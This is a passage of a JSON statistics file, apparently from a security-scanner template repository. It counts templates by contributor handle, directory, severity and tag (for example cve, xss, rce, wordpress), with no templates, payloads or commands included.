rogers","count":2},{"name":"zomsop82","count":2},{"name":"mrharshvardhan","count":2},{"name":"cckuakilong","count":2},{"name":"github.com/its0x08","count":2},{"name":"serrapa","count":2},{"name":"paperpen","count":2},{"name":"6mile","count":2},{"name":"vavkamil","count":2},{"name":"0xnirvana","count":2},{"name":"0xsapra","count":2},{"name":"w4cky_","count":2},{"name":"ehsahil","count":2},{"name":"t3l3machus","count":2},{"name":"supr4s","count":2},{"name":"joshlarsen","count":2},{"name":"0xsmiley","count":2},{"name":"x1m_martijn","count":2},{"name":"n-thumann","count":2},{"name":"socketz","count":2},{"name":"0xcrypto","count":2},{"name":"koti2","count":2},{"name":"brenocss","count":2},{"name":"calumjelrick","count":1},{"name":"n0el4kls","count":1},{"name":"failopen","count":1},{"name":"qlkwej","count":1},{"name":"retr02332","count":1},{"name":"2rs3c","count":1},{"name":"igibanez","count":1},{"name":"marcos_iaf","count":1},{"name":"deena","count":1},{"name":"harryha","count":1},{"name":"manuelbua","count":1},{"name":"mah3sec_","count":1},{"name":"mchklt","count":1},{"name":"francescocarlucci","count":1},{"name":"fpatrik","count":1},{"name":"invisiblethreat","count":1},{"name":"kagamigawa","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"kchason","count":1},{"name":"0h1in9e","count":1},{"name":"w0tx","count":1},{"name":"furkansenan","count":1},{"name":"higor melgaço","count":1},{"name":"harshinsecurity","count":1},{"name":"erikowen","count":1},{"name":"mr.bobo hp","count":1},{"name":"thirukrishnan","count":1},{"name":"shivampand3y","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"dievus","count":1},{"name":"realexp3rt","count":1},{"name":"hel10-web","count":1},{"name":"defektive","count":1},{"name":"guax1","count":1},{"name":"revblock","count":1},{"name":"willd96","count":1},{"name":"ky9oss","count":1},{"name":"viniciuspereiras","count":1},{"name":"rodnt","count":1},{"name":"sanineng","count":1},{"name":"httpvoid","count":1},{"name":"gboddin","count":1},{"name":"jacalynli","count":1},{"name":"lady_bug","count":1},{"name":"intx0x80","count":1},{"name":"davidfegyver","count":1},{"name":"iphantasmic","count":1},{"name":"prettyboyaaditya","count":1},{"name":"imhunterand","count":1},{"name":"elitebaz","count":1},{"name":"aron molnar","count":1},{"name":"petergrifin","count":1},{"name":"vulnspace","count":1},{"name":"kabirsuda","count":1},{"name":"omarjezi","count":1},{"name":"william söderberg @ withsecure","count":1},{"name":"noobexploiter","count":1},{"name":"pussycat0","count":1},{"name":"blckraven","count":1},{"name":"hczdmr","count":1},{"name":"ayadi","count":1},{"name":"tirtha","count":1},{"name":"tim_koopmans","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"f0xy","count":1},{"name":"akshansh","count":1},{"name":"luciannitescu","count":1},{"name":"shifacyclewla","count":1},{"name":"xeldax","count":1},{"name":"berkdusunur","count":1},{"name":"d0rkerdevil","count":1},{"name":"millermedia","count":1},{"name":"pphuahua","count":1},{"name":"flag007","count":1},{"name":"y0no","count":1},{"name":"official_blackhat13","count":1},{"name":"ok_bye_now","count":1},{"name":"fq_hsu","count":1},{"name":"undefl0w","count":1},{"name":"byobin","count":1},{"name":"droberson","count":1},{"name":"mrcl0wnlab","count":1},{"name":"drewvravick","count":1},{"name":"hexcat","count":1},{"name":"xc1ym","count":1},{"name":"bjxsec","count":1},{"name":"majidmc2","count":1},{"name":"ahmed sherif","count":1},{"name":"numan türle","count":1},{"name":"zeyad azima","count":1},{"name":"pdp","count":1},{"name":"f1she3","count":1},{"name":"ohlinge","count":1},{"name":"dawid-czarnecki","count":1},{"name":"0xd0ff9","count":1},{"name":"jaimin gondaliya","count":1},{"name":"luqman","count":1},{"name":"_harleo","count":1},{"name":"professorabhay","count":1},{"name":"adamparsons","count":1},{"name":"joaonevess","count":1},{"name":"pratik khalane","count":1},{"name":"miguelsegoviagil","count":1},{"name":"hlop","count":1},{"name":"vzamanillo","count":1},{"name":"barthy.koeln","count":1},{"name":"ynnirc","count":1},{"name":"yashvardhantripathi","count":1},{"name":"dwbzn","count":1},{"name":"archer","count":1},{"name":"sechunt3r","count":1},{"name":"hazana","count":1},{"name":"clment cruchet","count":1},{"name":"brabbit10","count":1},{"name":"jiheon-dev","count":1},{"name":"spac3wh1te","count":1},{"name":"furkansayim","count":1},{"name":"viondexd","count":1},{"name":"bugvsme","count":1},{"name":"daviey","count":1},{"name":"act1on3","count":1},{"name":"bjhulst","count":1},{"name":"thelicato","count":1},{"name":"secthebit","count":1},{"name":"shelld3v","count":1},{"name":"yashanand155","count":1},{"name":"oscarintherocks","count":1},{"name":"mass0ma","count":1},{"name":"jonathanwalker","count":1},{"name":"xstp","count":1},{"name":"gonski","count":1},{"name":"r3s ost","count":1},{"name":"jub0bs","count":1},{"name":"justmumu","count":1},{"name":"absshax","count":1},{"name":"stux","count":1},{"name":"michael wedl","count":1},{"name":"exceed","count":1},{"name":"cbadke","count":1},{"name":"ahmetpergamum","count":1},{"name":"lbb","count":1},{"name":"anonymous","count":1},{"name":"ilovebinbash","count":1},{"name":"pjborah","count":1},{"name":"mubassirpatel","count":1},{"name":"luqmaan hadia","count":1},{"name":"osamahamad","count":1},{"name":"_darrenmartyn","count":1},{"name":"david botelho mariano","count":1},{"name":"jc175","count":1},{"name":"charanrayudu","count":1},{"name":"none","count":1},{"name":"b0yd","count":1},{"name":"diablo","count":1},{"name":"themiddle","count":1},{"name":"regala_","count":1},{"name":"b4uh0lz","count":1},{"name":"sec_hawk","count":1},{"name":"galoget","count":1},{"name":"ruppde","count":1},{"name":"jteles","count":1},{"name":"carson chan","count":1},{"name":"chesterblue","count":1},{"name":"un-fmunozs","count":1},{"name":"bartu utku sarp","count":1},{"name":"carrot2","count":1},{"name":"s1r1us","count":1},{"name":"babybash","count":1},{"name":"nan-kl","count":1},{"name":"nagli","count":1},{"name":"shivanshkhari","count":1},{"name":"co0nan","count":1},{"name":"esonhugh","count":1},{"name":"petruknisme","count":1},{"name":"mhdsamx","count":1},{"name":"0xteles","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"daffianfo","count":1},{"name":"dabla","count":1},{"name":"borna nematzadeh","count":1},{"name":"rojanrijal","count":1},{"name":"napgh0st","count":1},{"name":"win3zz","count":1},{"name":"allenwest24","count":1},{"name":"jaskaran","count":1},{"name":"kaizensecurity","count":1},{"name":"matt miller","count":1},{"name":"pry0cc","count":1},{"name":"8authur","count":1},{"name":"yaser_s","count":1},{"name":"miroslavsotak","count":1},{"name":"ipanda","count":1},{"name":"mabdullah22","count":1},{"name":"unp4ck","count":1},{"name":"patralos","count":1},{"name":"x6263","count":1},{"name":"jeya seelan","count":1},{"name":"jadu101","count":1},{"name":"booboohq","count":1},{"name":"colbyjack1134","count":1},{"name":"erethon","count":1},{"name":"affix","count":1},{"name":"jfbes","count":1},{"name":"pascalheidmann","count":1},{"name":"ooooooo_q","count":1},{"name":"lingtren","count":1},{"name":"exid","count":1},{"name":"houdinis","count":1},{"name":"adrianmf","count":1},{"name":"ransomsec","count":1},{"name":"rinolock","count":1},{"name":"lark lab","count":1},{"name":"sttlr","count":1},{"name":"hanlaomo","count":1},{"name":"shockwave","count":1},{"name":"rschio","count":1},{"name":"marcio mendes","count":1},{"name":"amnotacat","count":1},{"name":"0ut0fb4nd","count":1},{"name":"zinminphy0","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"0xelkomy \u0026 c0nqr0r","count":1},{"name":"mayank_pandey01","count":1},{"name":"k3rwin","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"watchtowr","count":1},{"name":"gpiechnik2","count":1},{"name":"hateshape","count":1},{"name":"carlosvieira","count":1},{"name":"yashgoti","count":1},{"name":"jrolf","count":1},{"name":"aravind","count":1},{"name":"am0nt31r0","count":1},{"name":"wabafet","count":1},{"name":"danfaizer","count":1},{"name":"lixts","count":1},{"name":"luskabol","count":1},{"name":"unknown","count":1},{"name":"sicksec","count":1},{"name":"kailashbohara","count":1},{"name":"af001","count":1},{"name":"jas37","count":1},{"name":"adnanekhan","count":1},{"name":"zandros0","count":1},{"name":"abdullahisik","count":1},{"name":"abbas.heybati","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"unkl4b","count":1},{"name":"philippdelteil","count":1},{"name":"husain","count":1},{"name":"mordavid","count":1},{"name":"evolutionsec","count":1},{"name":"domenicoveneziano","count":1},{"name":"qianbenhyu","count":1},{"name":"yuansec","count":1},{"name":"brianlam38","count":1},{"name":"wlayzz","count":1},{"name":"chron0x","count":1},{"name":"rivalsec","count":1},{"name":"makyotox","count":1},{"name":"shiar","count":1},{"name":"0xh7ml","count":1},{"name":"0xceeb","count":1},{"name":"juliosmelo","count":1},{"name":"piyushchhiroliya","count":1},{"name":"geraldino2","count":1},{"name":"orpheus","count":1},{"name":"savik","count":1},{"name":"jeya.seelan","count":1},{"name":"schniggie","count":1},{"name":"retr0","count":1},{"name":"rumble773","count":1},{"name":"mammad_rahimzada","count":1},{"name":"kareemse1im","count":1},{"name":"sak1","count":1},{"name":"toufik-airane","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"tangxiaofeng7","count":1},{"name":"vinit989","count":1},{"name":"jcockhren","count":1},{"name":"kiks7","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"elouhi","count":1},{"name":"olewagner","count":1},{"name":"dale clarke","count":1},{"name":"samuelsamuelsamuel","count":1},{"name":"push4d","count":1},{"name":"p-l-","count":1},{"name":"paper-pen","count":1},{"name":"sinsinology","count":1},{"name":"unblvr1","count":1},{"name":"ap3r","count":1},{"name":"ringo","count":1},{"name":"ramkrishna sawant","count":1},{"name":"aresx","count":1},{"name":"sospiro","count":1},{"name":"null_hypothesis","count":1},{"name":"liquidsec","count":1},{"name":"open-sec","count":1},{"name":"momen eldawakhly","count":1},{"name":"lamscun","count":1},{"name":"h4kux","count":1},{"name":"andysvints","count":1},{"name":"ling","count":1},{"name":"w8ay","count":1},{"name":"b0rn2r00t","count":1},{"name":"dorkerdevil","count":1},{"name":"youngpope","count":1},{"name":"bywalks","count":1},{"name":"mohammedsaneem","count":1},{"name":"dmartyn","count":1},{"name":"sshell","count":1},{"name":"dhiyanesdk","count":1},{"name":"amir-h-fallahi","count":1},{"name":"ramondunker","count":1},{"name":"vikas kundu","count":1},{"name":"west-wise","count":1},{"name":"lrtk-coder","count":1},{"name":"sdcampbell","count":1},{"name":"opencirt","count":1},{"name":"queencitycyber","count":1},{"name":"team syslifters / christoph mahrl","count":1},{"name":"stupidfish","count":1},{"name":"andirrahmani1","count":1},{"name":"1nf1n7y","count":1},{"name":"tehtbl","count":1},{"name":"banana69","count":1},{"name":"mys7ic","count":1},{"name":"rubina119","count":1},{"name":"hardik-rathod","count":1},{"name":"5up3r541y4n","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"soyelmago","count":1},{"name":"m0ck3d","count":1},{"name":"dk999","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"floriandewald","count":1},{"name":"iampritam","count":1},{"name":"0xtavian","count":1},{"name":"phillipo","count":1},{"name":"kr1shna4garwal","count":1},{"name":"arjunchandarana","count":1},{"name":"amirmsafari","count":1},{"name":"kresec","count":1},{"name":"izn0u","count":1},{"name":"mohammad reza omrani | @omranisecurity","count":1},{"name":"ptonewreckin","count":1},{"name":"metascan","count":1},{"name":"godfatherorwa","count":1},{"name":"denandz","count":1},{"name":"tirtha_mandal","count":1},{"name":"josecosta","count":1},{"name":"freakyclown","count":1},{"name":"d4ly","count":1},{"name":"0xprial","count":1},{"name":"yiran","count":1},{"name":"therealtoastycat","count":1},{"name":"becivells","count":1},{"name":"notsoevilweasel","count":1},{"name":"manasmbellani","count":1},{"name":"mariam tariq","count":1},{"name":"apple","count":1},{"name":"nytr0gen","count":1},{"name":"rotemreiss","count":1},{"name":"hüseyin tintaş","count":1},{"name":"bughuntersurya","count":1},{"name":"bad5ect0r","count":1},{"name":"kiransau","count":1},{"name":"ph33rr","count":1},{"name":"miryangjung","count":1},{"name":"xcapri","count":1},{"name":"akokonunes","count":1},{"name":"omarkurt","count":1},{"name":"pudsec","count":1},{"name":"pwnwithlove","count":1},{"name":"sickwell","count":1},{"name":"arr0way","count":1},{"name":"vthiery","count":1},{"name":"cravaterouge","count":1},{"name":"infosecsanyam","count":1},{"name":"sherlocksecurity","count":1},{"name":"sorrowx3","count":1},{"name":"alevsk","count":1},{"name":"zsusac","count":1},{"name":"mantissts","count":1},{"name":"mukundbhuva","count":1},{"name":"jbertman","count":1},{"name":"shiva (strobes security)","count":1},{"name":"s1r1u5_","count":1},{"name":"apt-mirror","count":1},{"name":"sw0rk17","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"duty_1g","count":1},{"name":"natto97","count":1},{"name":"hakimkt","count":1},{"name":"palanichamy_perumal","count":1},{"name":"naglis","count":1},{"name":"lethargynavigator","count":1},{"name":"staticnoise","count":1},{"name":"technicaljunkie","count":1},{"name":"nerrorsec","count":1},{"name":"thebinitghimire","count":1},{"name":"exploitation","count":1},{"name":"remonsec","count":1},{"name":"narluin","count":1},{"name":"alexrydzak","count":1},{"name":"rotembar","count":1},{"name":"kurohost","count":1},{"name":"drfabiocastro","count":1},{"name":"zn9988","count":1},{"name":"high","count":1},{"name":"breno_css","count":1},{"name":"nielsing","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"aaronchen0","count":1},{"name":"_c0wb0y_","count":1},{"name":"alperenkesk","count":1},{"name":"fopina","count":1},{"name":"notwhy","count":1},{"name":"mbmy","count":1},{"name":"h4sh5","count":1},{"name":"j33n1k4","count":1},{"name":"hotpot","count":1},{"name":"elder tao","count":1},{"name":"skylark-lab","count":1},{"name":"whynotke","count":1},{"name":"0xcharan","count":1},{"name":"amanrawat","count":1},{"name":"aringo-bf","count":1},{"name":"compr00t","count":1},{"name":"jna1","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"screamy","count":1},{"name":"0xparth","count":1},{"name":"danigoland","count":1},{"name":"zhenwarx","count":1},{"name":"wpsec","count":1},{"name":"caon","count":1},{"name":"shreyapohekar","count":1},{"name":"micha3lb3n","count":1},{"name":"knassar702","count":1},{"name":"0xrod","count":1},{"name":"mlec","count":1},{"name":"mesaglio","count":1},{"name":"noamrathaus","count":1},{"name":"th3r4id","count":1},{"name":"myst7ic","count":1},{"name":"whotwagner","count":1},{"name":"nuts7","count":1},{"name":"dali","count":1},{"name":"puben","count":1},{"name":"ahmed abou-ela","count":1},{"name":"ndmalc","count":1},{"name":"pepitoh","count":1},{"name":"udyz","count":1},{"name":"jbaines-r7","count":1},{"name":"xshuden","count":1},{"name":"hyunsoo-ds","count":1},{"name":"juicypotato1","count":1},{"name":"fur1na","count":1},{"name":"arall","count":1},{"name":"akash.c","count":1},{"name":"djoevanka","count":1},{"name":"anon-artist","count":1},{"name":"ola456","count":1},{"name":"eremit4","count":1},{"name":"irshadahamed","count":1},{"name":"smaranchand","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"patrick pirker","count":1},{"name":"adilsoybali","count":1},{"name":"th3.d1p4k","count":1},{"name":"christbowel","count":1},{"name":"udinchan","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"fmunozs","count":1},{"name":"arqsz","count":1},{"name":"chetgan","count":1},{"name":"phyr3wall","count":1},{"name":"nobody","count":1},{"name":"ldionmarcil","count":1},{"name":"ledoubletake","count":1},{"name":"yavolo","count":1},{"name":"yusakie","count":1},{"name":"alex","count":1},{"name":"ofjaaah","count":1},{"name":"r3nz0","count":1},{"name":"aayush vishnoi","count":1},{"name":"axrk","count":1},{"name":"mayankpandey01","count":1},{"name":"hakluke","count":1},{"name":"elmahdi","count":1},{"name":"tea","count":1},{"name":"michal-mikolas","count":1},{"name":"0xceba","count":1},{"name":"aaban solutions","count":1},{"name":"noah @thesubtlety","count":1},{"name":"evan rubinstien","count":1},{"name":"couskito","count":1},{"name":"mihhailsokolov","count":1}],"directory":[{"name":"http","count":7593},{"name":"file","count":402},{"name":"workflows","count":191},{"name":"network","count":135},{"name":"cloud","count":134},{"name":"code","count":81},{"name":"javascript","count":60},{"name":"ssl","count":29},{"name":"dns","count":22},{"name":"dast","count":22},{"name":"headless","count":12},{"name":"passive","count":1},{"name":"cves.json","count":1},{"name":"contributors.json","count":1},{"name":"TEMPLATES-STATS.json","count":1}],"severity":[{"name":"info","count":3780},{"name":"high","count":1786},{"name":"medium","count":1560},{"name":"critical","count":1058},{"name":"low","count":268},{"name":"unknown","count":39}],"types":[{"name":"file","count":402},{"name":"dns","count":25}]} +{"tags":[{"name":"cve","count":2571},{"name":"panel","count":1167},{"name":"wordpress","count":1002},{"name":"exposure","count":968},{"name":"xss","count":917},{"name":"wp-plugin","count":872},{"name":"osint","count":804},{"name":"tech","count":698},{"name":"lfi","count":678},{"name":"misconfig","count":673},{"name":"rce","count":616},{"name":"edb","count":597},{"name":"packetstorm","count":546},{"name":"wpscan","count":506},{"name":"cve2021","count":493},{"name":"cve2022","count":472},{"name":"wp","count":435},{"name":"cve2023","count":393},{"name":"sqli","count":370},{"name":"unauth","count":370},{"name":"file","count":345},{"name":"authenticated","count":344},{"name":"detect","count":313},{"name":"intrusive","count":312},{"name":"login","count":299},{"name":"kev","count":277},{"name":"cve2020","count":256},{"name":"token-spray","count":243},{"name":"config","count":224},{"name":"oast","count":223},{"name":"top-200","count":222},{"name":"default-login","count":222},{"name":"devops","count":212},{"name":"osint-social","count":210},{"name":"malware","count":209},{"name":"apache","count":198},{"name":"network","count":197},{"name":"token","count":194},{"name":"","count":191},{"name":"cve2018","count":170},{"name":"cloud","count":169},{"name":"iot","count":167},{"name":"cve2019","count":163},{"name":"keys","count":156},{"name":"install","count":151},{"name":"joomla","count":148},{"name":"redirect","count":138},{"name":"tcp","count":137},{"name":"aws","count":135},{"name":"cve2024","count":134},{"name":"auth-bypass","count":133},{"name":"ssrf","count":120},{"name":"amazon","count":118},{"name":"phishing","count":117},{"name":"cms","count":115},{"name":"files","count":113},{"name":"cve2010","count":112},{"name":"cve2017","count":110},{"name":"router","count":108},{"name":"top-100","count":100},{"name":"aws-cloud-config","count":91},{"name":"disclosure","count":89},{"name":"linux","count":85},{"name":"code","count":81},{"name":"local","count":80},{"name":"privesc","count":79},{"name":"seclists","count":79},{"name":"tokens","count":78},{"name":"takeover","count":78},{"name":"fileupload","count":76},{"name":"oracle","count":74},{"name":"kubernetes","count":71},{"name":"oss","count":69},{"name":"js","count":68},{"name":"cisco","count":67},{"name":"enum","count":65},{"name":"adobe","count":64},{"name":"k8s","count":62},{"name":"ir","count":61},{"name":"huntr","count":60},{"name":"cve2015","count":59},{"name":"atlassian","count":59},{"name":"detection","count":57},{"name":"cve2016","count":57},{"name":"google","count":56},{"name":"vmware","count":56},{"name":"c2","count":55},{"name":"tenable","count":48},{"name":"logs","count":48},{"name":"log4j","count":47},{"name":"vulhub","count":46},{"name":"hackerone","count":46},{"name":"php","count":45},{"name":"aem","count":45},{"name":"generic","count":45},{"name":"osint-gaming","count":45},{"name":"debug","count":44},{"name":"cve2014","count":44},{"name":"deserialization","count":44},{"name":"jndi","count":44},{"name":"cnvd","count":43},{"name":"traversal","count":43},{"name":"osint-hobby","count":42},{"name":"oa","count":42},{"name":"osint-porn","count":42},{"name":"microsoft","count":42},{"name":"plugin","count":42},{"name":"springboot","count":41},{"name":"misc","count":40},{"name":"injection","count":39},{"name":"listing","count":38},{"name":"miscellaneous","count":38},{"name":"jira","count":37},{"name":"ibm","count":36},{"name":"cti","count":36},{"name":"osint-misc","count":35},{"name":"k8s-cluster-security","count":34},{"name":"sap","count":34},{"name":"fuzz","count":34},{"name":"ssl","count":33},{"name":"devsecops","count":32},{"name":"dlink","count":32},{"name":"tls","count":32},{"name":"osint-tech","count":31},{"name":"ec2","count":30},{"name":"wp-theme","count":30},{"name":"osint-coding","count":30},{"name":"gitlab","count":28},{"name":"api","count":28},{"name":"fortinet","count":28},{"name":"lfr","count":27},{"name":"file-upload","count":27},{"name":"citrix","count":27},{"name":"dns","count":27},{"name":"proxy","count":27},{"name":"bestwebsoft","count":27},{"name":"admin","count":26},{"name":"manageengine","count":26},{"name":"zohocorp","count":26},{"name":"cve2012","count":26},{"name":"ssh","count":26},{"name":"firewall","count":26},{"name":"weaver","count":25},{"name":"dast","count":25},{"name":"zoho","count":25},{"name":"xxe","count":25},{"name":"osint-shopping","count":24},{"name":"osint-images","count":24},{"name":"printer","count":24},{"name":"osint-business","count":24},{"name":"osint-finance","count":24},{"name":"yonyou","count":23},{"name":"stored-xss","count":23},{"name":"tomcat","count":23},{"name":"audit","count":23},{"name":"s3","count":22},{"name":"github","count":22},{"name":"cicd","count":22},{"name":"prestashop","count":22},{"name":"weblogic","count":21},{"name":"msf","count":21},{"name":"ecology","count":21},{"name":"camera","count":20},{"name":"ftp","count":20},{"name":"info-leak","count":20},{"name":"jenkins","count":20},{"name":"wavlink","count":20},{"name":"vpn","count":19},{"name":"hp","count":19},{"name":"apt","count":19},{"name":"struts","count":19},{"name":"grafana","count":19},{"name":"rukovoditel","count":19},{"name":"confluence","count":19},{"name":"node.js","count":18},{"name":"ruijie","count":18},{"name":"osint-music","count":18},{"name":"android","count":18},{"name":"backdoor","count":18},{"name":"coldfusion","count":18},{"name":"cve2011","count":18},{"name":"nginx","count":17},{"name":"headless","count":17},{"name":"microweber","count":17},{"name":"magento","count":17},{"name":"honeypot","count":17},{"name":"backup","count":17},{"name":"zyxel","count":17},{"name":"azure","count":17},{"name":"mail","count":17},{"name":"ssti","count":16},{"name":"cve2009","count":16},{"name":"bypass","count":16},{"name":"service","count":16},{"name":"dashboard","count":16},{"name":"jarm","count":16},{"name":"rconfig","count":16},{"name":"alibaba","count":16},{"name":"status","count":16},{"name":"osint-blog","count":16},{"name":"netgear","count":15},{"name":"seeyon","count":15},{"name":"moosocial","count":15},{"name":"ruby","count":15},{"name":"woocommerce","count":15},{"name":"cve2013","count":15},{"name":"ivanti","count":15},{"name":"xwiki","count":15},{"name":"installer","count":15},{"name":"redhat","count":15},{"name":"setup","count":15},{"name":"docker","count":15},{"name":"tongda","count":15},{"name":"cve2008","count":15},{"name":"java","count":15},{"name":"nagios","count":15},{"name":"cnvd2021","count":15},{"name":"redis","count":14},{"name":"creds-stuffing","count":14},{"name":"nodejs","count":14},{"name":"npm","count":14},{"name":"osint-health","count":14},{"name":"node","count":14},{"name":"smtp","count":14},{"name":"rds","count":14},{"name":"osint-art","count":14},{"name":"jboss","count":14},{"name":"login-check","count":14},{"name":"git","count":14},{"name":"dell","count":14},{"name":"icewarp","count":14},{"name":"domainmod","count":14},{"name":"windows","count":13},{"name":"airflow","count":13},{"name":"osint-political","count":13},{"name":"cuppacms","count":13},{"name":"rails","count":13},{"name":"auth","count":13},{"name":"graphql","count":13},{"name":"osint-dating","count":13},{"name":"sonicwall","count":13},{"name":"abstractapi","count":13},{"name":"kafka","count":13},{"name":"fuzzing","count":13},{"name":"laravel","count":13},{"name":"fortigate","count":13},{"name":"cuppa","count":13},{"name":"hashicorp","count":13},{"name":"mysql","count":13},{"name":"postgresql","count":13},{"name":"webserver","count":12},{"name":"drupal","count":12},{"name":"newrelic","count":12},{"name":"vbulletin","count":12},{"name":"deployments","count":12},{"name":"jetbrains","count":12},{"name":"smb","count":12},{"name":"netsweeper","count":12},{"name":"phpgurukul","count":12},{"name":"cache","count":12},{"name":"zimbra","count":12},{"name":"spring","count":12},{"name":"doppler","count":12},{"name":"ofbiz","count":12},{"name":"osint-video","count":11},{"name":"xstream","count":11},{"name":"prometheus","count":11},{"name":"dedecms","count":11},{"name":"iam","count":11},{"name":"hikvision","count":11},{"name":"glpi","count":11},{"name":"django","count":11},{"name":"iis","count":11},{"name":"jolokia","count":11},{"name":"fastjson","count":11},{"name":"solr","count":10},{"name":"digitalocean","count":10},{"name":"crlf","count":10},{"name":"elasticsearch","count":10},{"name":"samsung","count":10},{"name":"phpmyadmin","count":10},{"name":"sitecore","count":10},{"name":"dahua","count":10},{"name":"zabbix","count":10},{"name":"instrusive","count":10},{"name":"blind","count":10},{"name":"thinkphp","count":10},{"name":"db","count":10},{"name":"symfony","count":10},{"name":"progress","count":10},{"name":"xstream_project","count":10},{"name":"solarview","count":10},{"name":"dropbox","count":10},{"name":"firebase","count":9},{"name":"console","count":9},{"name":"versa","count":9},{"name":"vcenter","count":9},{"name":"exchange","count":9},{"name":"joomla\\!","count":9},{"name":"wso2","count":9},{"name":"sophos","count":9},{"name":"gitea","count":9},{"name":"opencats","count":9},{"name":"pfsense","count":9},{"name":"python","count":9},{"name":"elastic","count":9},{"name":"cnvd2020","count":9},{"name":"kube","count":9},{"name":"cloudtrail","count":9},{"name":"druid","count":9},{"name":"sangfor","count":9},{"name":"artica","count":9},{"name":"secret","count":9},{"name":"gateway","count":9},{"name":"f5","count":9},{"name":"lucee","count":9},{"name":"scada","count":9},{"name":"bitbucket","count":9},{"name":"facebook","count":9},{"name":"moodle","count":9},{"name":"lfprojects","count":8},{"name":"microfocus","count":8},{"name":"cacti","count":8},{"name":"oauth","count":8},{"name":"huawei","count":8},{"name":"symantec","count":8},{"name":"atom","count":8},{"name":"odoo","count":8},{"name":"solarwinds","count":8},{"name":"config-audit","count":8},{"name":"spotweb_project","count":8},{"name":"mirai","count":8},{"name":"spotweb","count":8},{"name":"e-office","count":8},{"name":"wanhu","count":8},{"name":"bucket","count":8},{"name":"nexus","count":8},{"name":"nagiosxi","count":8},{"name":"cloud-enum","count":8},{"name":"go","count":8},{"name":"manager","count":8},{"name":"phpjabbers","count":8},{"name":"metadata","count":8},{"name":"ognl","count":8},{"name":"recon","count":8},{"name":"mlflow","count":8},{"name":"hms","count":8},{"name":"discord","count":8},{"name":"phpinfo","count":8},{"name":"unauthenticated","count":8},{"name":"ldap","count":8},{"name":"openemr","count":8},{"name":"default-page","count":8},{"name":"osint-news","count":8},{"name":"cisco-switch","count":8},{"name":"emerge","count":8},{"name":"vrealize","count":7},{"name":"nortekcontrol","count":7},{"name":"vpc","count":7},{"name":"keking","count":7},{"name":"squirrelmail","count":7},{"name":"car_rental_management_system_project","count":7},{"name":"fortios","count":7},{"name":"oos","count":7},{"name":"websphere","count":7},{"name":"nacos","count":7},{"name":"gradio","count":7},{"name":"mobileiron","count":7},{"name":"slack","count":7},{"name":"bloofox","count":7},{"name":"blockchain","count":7},{"name":"telesquare","count":7},{"name":"linkedin","count":7},{"name":"exploitdb","count":7},{"name":"activemq","count":7},{"name":"fpd","count":7},{"name":"gogs","count":7},{"name":"pmb","count":7},{"name":"geoserver","count":7},{"name":"maps","count":7},{"name":"teamcity","count":7},{"name":"bigip","count":7},{"name":"opensis","count":7},{"name":"rfi","count":7},{"name":"vms","count":7},{"name":"twitter","count":7},{"name":"moodating","count":7},{"name":"shopify","count":7},{"name":"avtech","count":7},{"name":"splunk","count":7},{"name":"pods","count":7},{"name":"filemanager","count":7},{"name":"mongodb","count":7},{"name":"monstra","count":7},{"name":"contec","count":7},{"name":"landray","count":7},{"name":"error","count":7},{"name":"database","count":7},{"name":"ruckus","count":7},{"name":"flutterwave","count":6},{"name":"synacor","count":6},{"name":"keycloak","count":6},{"name":"paloaltonetworks","count":6},{"name":"doctor_appointment_system_project","count":6},{"name":"couchdb","count":6},{"name":"rat","count":6},{"name":"express","count":6},{"name":"cnvd2023","count":6},{"name":"jamf","count":6},{"name":"security","count":6},{"name":"liferay","count":6},{"name":"asp","count":6},{"name":"bmc","count":6},{"name":"servicenow","count":6},{"name":"cockpit","count":6},{"name":"openvpn","count":6},{"name":"kubelet","count":6},{"name":"jetty","count":6},{"name":"74cms","count":6},{"name":"tikiwiki","count":6},{"name":"paypal","count":6},{"name":"microstrategy","count":6},{"name":"leak","count":6},{"name":"webmin","count":6},{"name":"cobbler","count":6},{"name":"zhiyuan","count":6},{"name":"minio","count":6},{"name":"chanjet","count":6},{"name":"online-fire-reporting","count":6},{"name":"server","count":6},{"name":"plesk","count":6},{"name":"gcp","count":6},{"name":"doctor-appointment-system","count":6},{"name":"mikrotik","count":6},{"name":"sonarqube","count":6},{"name":"log","count":6},{"name":"elfinder","count":6},{"name":"jeecg","count":6},{"name":"magmi","count":6},{"name":"beyondtrust","count":6},{"name":"advantech","count":6},{"name":"asus","count":6},{"name":"sql","count":6},{"name":"online_fire_reporting_system_project","count":6},{"name":"typo3","count":6},{"name":"graylog","count":5},{"name":"metinfo","count":5},{"name":"goanywhere","count":5},{"name":"hybris","count":5},{"name":"circarlife","count":5},{"name":"mssql","count":5},{"name":"resin","count":5},{"name":"openai","count":5},{"name":"kkfileview","count":5},{"name":"h3c","count":5},{"name":"tibco","count":5},{"name":"circontrol","count":5},{"name":"avaya","count":5},{"name":"wpdevart","count":5},{"name":"10web","count":5},{"name":"ems","count":5},{"name":"storage","count":5},{"name":"webkul","count":5},{"name":"web3","count":5},{"name":"zzzcms","count":5},{"name":"react","count":5},{"name":"qdpm","count":5},{"name":"apisix","count":5},{"name":"jupyter","count":5},{"name":"ethereum","count":5},{"name":"avideo","count":5},{"name":"glpi-project","count":5},{"name":"caucho","count":5},{"name":"sysaid","count":5},{"name":"etcd","count":5},{"name":"magmi_project","count":5},{"name":"openfire","count":5},{"name":"openstack","count":5},{"name":"password","count":5},{"name":"http","count":5},{"name":"cve2007","count":5},{"name":"vehicle_service_management_system_project","count":5},{"name":"firmware","count":5},{"name":"craftcms","count":5},{"name":"froxlor","count":5},{"name":"hoteldruid","count":5},{"name":"totolink","count":5},{"name":"qnap","count":5},{"name":"cdata","count":5},{"name":"percha","count":5},{"name":"asana","count":5},{"name":"schneider-electric","count":5},{"name":"checkpoint","count":5},{"name":"open-emr","count":5},{"name":"carrental","count":5},{